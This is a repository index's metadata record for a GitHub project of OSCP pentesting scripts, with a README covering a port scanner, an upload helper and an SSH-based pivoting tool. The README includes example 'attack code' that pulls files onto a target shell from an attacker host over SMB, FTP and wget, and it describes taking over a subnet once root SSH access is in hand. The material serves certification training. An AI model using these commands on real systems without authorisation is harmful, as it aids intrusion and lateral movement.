{"id":13844816,"url":"https://github.com/PabloMansanet/c0toolkit","last_synced_at":"2025-07-12T00:31:58.095Z","repository":{"id":137894142,"uuid":"157747455","full_name":"PabloMansanet/c0toolkit","owner":"PabloMansanet","description":"Miscellaneous pentesting scripts for OSCP","archived":false,"fork":false,"pushed_at":"2018-12-03T17:40:33.000Z","size":5,"stargazers_count":57,"open_issues_count":0,"forks_count":10,"subscribers_count":3,"default_branch":"master","last_synced_at":"2024-11-15T06:23:05.480Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/PabloMansanet.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2018-11-15T17:23:40.000Z","updated_at":"2024-08-12T19:43:21.000Z","dependencies_parsed_at":"2024-02-16T16:24:50.137Z","dependency_job_id":"1e14c66f-c486-42b6-9ae5-c40d220d97fa","html_url":"https://github.com/PabloMansanet/c0toolkit","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/PabloMansanet%2Fc0toolkit","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/PabloMansanet%2Fc0toolkit/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/PabloMansanet%2Fc0toolkit/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/PabloMansanet%2Fc0toolkit/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/PabloMansanet","download_url":"https://codeload.github.com/PabloMansanet/c0toolkit/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225772776,"owners_count":17521888,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:02:57.954Z","updated_at":"2024-11-21T17:30:53.159Z","avatar_url":"https://github.com/PabloMansanet.png","language":"Shell","funding_links":[],"categories":["Shell (473)","Shell"],"sub_categories":[],"readme":"# c0toolkit\n\nMiscellaneous pentesting scripts I wrote as I was going through the OSCP\ncertification. I will continue to add scripts as I clean them up.\n\n## Usage\n\nJust drag the scripts to your PATH and install the dependencies. Calling each\nscript with no arguments will provide usage instructions. Here is a breakdown of\nthe scripts and their uses:\n\n### sc0ut\n\nGeneral purpose \"first engagement\" scan. Tries to achieve a compromise between\nspeed and thoroughness. It starts with a lightweight \"top ports\" nmap scan so\nyou have something to do while waiting for the in-depth sweeps. It continues\nwith a full range unicornscan, then drills down on the open ports with NMAP.\nFinally, it repeats the process for the UDP ports.\n\n### c0up\n\nAttack upload manager. Through various python dependencies, it helps upload\nfiles to target hosts under a variety of protocols. Choose the upload protocol,\nand c0up generates a quick script to copy-paste into the target shell.\n\nSupports:\n   * smb\n   * ftp\n   * http\n\nExample (smb):\n```\n[c0rax](c0toolkit)\u003e ./c0up -s test \n=========== MSDOS ATTACK CODE =========== \ncopy \\\\10.11.0.14\\c0up\\test test\n========================================= \n\n Copy the attack code above to your target shell, then terminate this \n script with CTRL-C to shut down the SMB server. \n\n Starting smbserver instance... \n * impacket-smbserver c0up test\n```\n\nExample (ftp):\n```\n[c0rax](test)\u003e ./c0up -f 21 test\n=========== MSDOS ATTACK CODE =========== \necho open 192.168.1.66 21 \u003e ftp.txt\necho USER iftp iftp\u003e\u003e ftp.txt\necho quote pasv\u003e\u003e ftp.txt\necho binary \u003e\u003e ftp.txt\necho GET test \u003e\u003e ftp.txt\necho bye \u003e\u003e ftp.txt\nftp -v -n -s:ftp.txt\n========================================= \n\n=========== BASH ATTACK CODE ============ \n$ wget --user=iftp --password iftp ftp://192.168.1.66:21/test\n========================================= \n\n Copy the attack code above to your target shell, then terminate this \n script with CTRL-C to shut down the web server. \n\n Starting python ftp server instance... \n * python -m pyftpdlib --port=21 -u iftp -P iftp -D\n```\n\n### c0lonize\n\nProvided you have ssh root access to a remote linux host, c0lonize offers a\nquick way to set up layer 3 tunneling, establishing a VPN over SSH and easily \ntaking over an entire subnet. It's a noisy but very comfortable way to pivot,\nwhich is very useful in engagements like the OSCP labs.\n\nIt has a big advantage over sshuttle and similar tools, in that you have control\nover IP traffic. You can ping, SYN-scan and use all your tools directly, without\nneeding proxychains as an intermediary.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FPabloMansanet%2Fc0toolkit","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FPabloMansanet%2Fc0toolkit","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FPabloMansanet%2Fc0toolkit/lists"}